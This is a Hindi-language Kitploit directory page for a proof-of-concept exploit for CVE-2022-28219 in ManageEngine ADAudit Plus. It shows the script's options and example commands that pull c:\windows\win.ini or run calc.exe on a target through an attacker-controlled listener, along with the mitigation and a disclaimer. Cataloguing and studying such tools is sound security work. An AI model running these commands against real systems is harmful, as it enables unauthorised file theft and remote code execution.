Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2022-28219 — ManageEngine ADAudit Plus CVE-2022-28219 के लिए PoC | Kitploit
उपकरण/GitHubGitHub/horizon3ai/cve-2022-28219
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगरिमोट एक्सेस टूल
GitHubhorizon3ai/cve-2022-28219

CVE-2022-28219

ManageEngine ADAudit Plus CVE-2022-28219 के लिए PoC

रिपॉजिटरी देखें
43154 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2022-28219

CVE-2022-28219 के लिए POC जो ManageEngine ADAudit Plus बिल्ड < 7060 को प्रभावित करता है

तकनीकी विश्लेषण

हमारे ब्लॉग पर अधिक विवरण: https://www.horizon3.ai/red-team-blog-cve-2022-28219

उपयोग

root@kitploit:~
% python3 CVE-2022-28219.py -h
usage: CVE-2022-28219.py [-h] -t TARGET -l LHOST -d DOMAIN [-lhp HTTP_PORT] [-lfp FTP_PORT] [-f FILE] [-c COMMAND] [-u USER]

optional arguments:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        target URL with port
  -l LHOST, --lhost LHOST
                        local bind IP
  -d DOMAIN, --domain DOMAIN
                        fully qualified domain served by ADAudit Plus
  -lhp HTTP_PORT, --http-port HTTP_PORT
                        local HTTP port to bind to
  -lfp FTP_PORT, --ftp-port FTP_PORT
                        local FTP port to bind to
  -f FILE, --file FILE  get file or directory listing at given path, use forward slashes and don't include drive, e.g. /windows/win.ini or /users
  -c COMMAND, --command COMMAND
                        command to execute, e.g. calc.exe
  -u USER, --user USER  user running ADAudit Plus app, useful for finding upload file quickly

उदाहरण के लिए, c:\windows\win.ini फ़ाइल प्राप्त करने के लिए:

python3 CVE-2022-28219.py -t <target_url> -l <attacker_ip> -d <target_fqdn> -f /windows/win.ini

या लक्ष्य पर calc.exe चलाने के लिए:

python3 CVE-2022-28219.py -t <target_url> -l <attacker_ip> -d <target_fqdn> -c calc.exe

नोट: फ़ाइल पुनर्प्राप्ति और RCE के लिए आवश्यक है कि ManageEngine ADAudit Plus Java रनटाइम 8u121 या उससे नीचे पर चल रहा हो। यह अधिकांश समय सत्य होगा क्योंकि ADAudit Plus के साथ बंडल किया गया डिफ़ॉल्ट Java रनटाइम संस्करण 8u051 है।

शमन

ManageEngine ADAudit Plus बिल्ड 7060 या बाद में अपडेट करें।

नवीनतम सुरक्षा अनुसंधान के लिए Horizon3.ai Attack Team को Twitter पर फॉलो करें:

  • Horizon3 Attack Team
  • James Horseman
  • Zach Hanley

अस्वीकरण

यह सॉफ्टवेयर पूरी तरह से शैक्षणिक अनुसंधान और प्रभावी रक्षात्मक तकनीकों के विकास के उद्देश्यों के लिए बनाया गया है, और इसका उद्देश्य स्पष्ट रूप से अधिकृत किए गए सिस्टम को छोड़कर किसी भी सिस्टम पर हमला करने के लिए उपयोग नहीं किया जाना है। परियोजना अनुरक्षक सॉफ्टवेयर के दुरुपयोग के लिए उत्तरदायी या जिम्मेदार नहीं हैं। जिम्मेदारी से उपयोग करें।

टूल डाउनलोड करें